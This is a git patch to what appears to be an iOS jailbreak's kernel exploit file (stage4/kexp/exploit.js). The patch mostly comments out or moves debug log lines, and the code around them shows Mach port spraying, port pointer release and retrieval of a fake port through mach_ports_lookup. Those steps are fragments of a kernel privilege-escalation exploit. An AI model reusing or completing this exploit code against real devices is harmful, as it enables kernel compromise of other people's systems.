From 30cbeaa4c3c2e07fbabbb231591f95b6a1724e64 Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Sun, 31 Jul 2022 20:46:39 -0400
Subject: lol

---
 src/stage4/kexp/exploit.js | 26 +++++++++++++-------------
 1 file changed, 13 insertions(+), 13 deletions(-)

(limited to 'src/stage4/kexp')

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 741f217..e761184 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -360,22 +360,22 @@ function r3gister(task, init_port_set, real_count, fake_count) {
 }
 
 function mach_ports_lookup_shit() {
-	p0laris_log("fuck\n");
+//	p0laris_log("fuck\n");
 	var arrz = shit_heap(4);
-	p0laris_log("fuck\n");
+//	p0laris_log("fuck\n");
 	write_u32(arrz, 0);
-	p0laris_log("fuck\n");
+//	p0laris_log("fuck\n");
 	var sz = shit_heap(4);;
-	p0laris_log("fuck\n");
+//	p0laris_log("fuck\n");
 	write_u32(sz, 3);
-	p0laris_log("fuck\n");
+//	p0laris_log("fuck\n");
 //	var mts = mach_task_self();
 	p0laris_log("fuck\n");
 	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
-	puts("helo");
-	p0laris_log("mpl success\n");
-	p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
-	p0laris_log("mpl success\n");
+//	puts("helo");
+//	p0laris_log("mpl success\n");
+//	p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+//	p0laris_log("mpl success\n");
 
 	return read_u32(read_u32(arrz) + 8);
 //	return 0x42603;
@@ -460,7 +460,7 @@ again: while (true) {
 //	for (var i = 0; i < 8; i++) {
 		var dummy = shit_heap(4);
 		if (i % 4 == 0) {
-			p0laris_log("spray_ports %d\n", i);
+//			p0laris_log("spray_ports %d\n", i);
 		}
 		write_u32(fp + (i << 2), spray_ports(1));
 		spray(small_buf, read_u32(small_size), dummy);
@@ -470,7 +470,7 @@ again: while (true) {
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
 		if (i % 4 == 0) {
-			p0laris_log("release_port_ptrs %d\n", i);
+//			p0laris_log("release_port_ptrs %d\n", i);
 		}
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
@@ -487,13 +487,13 @@ again: while (true) {
 	write_u32(sz, 3);
 //	mach_ports_lookup_shit_dealloc();
 	var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+	p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
+	p0laris_log("r3gister done\n");
 	mach_ports_lookup(mach_task_self(), arrz, sz);
 	p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 	p0laris_log("mpl success\n");
 
 	var fake_port = read_u32(read_u32(arrz) + 8);
-	p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
-	p0laris_log("r3gister done\n");
 //	while (true) {
 		//
 //	}
-- 
cgit v1.2.3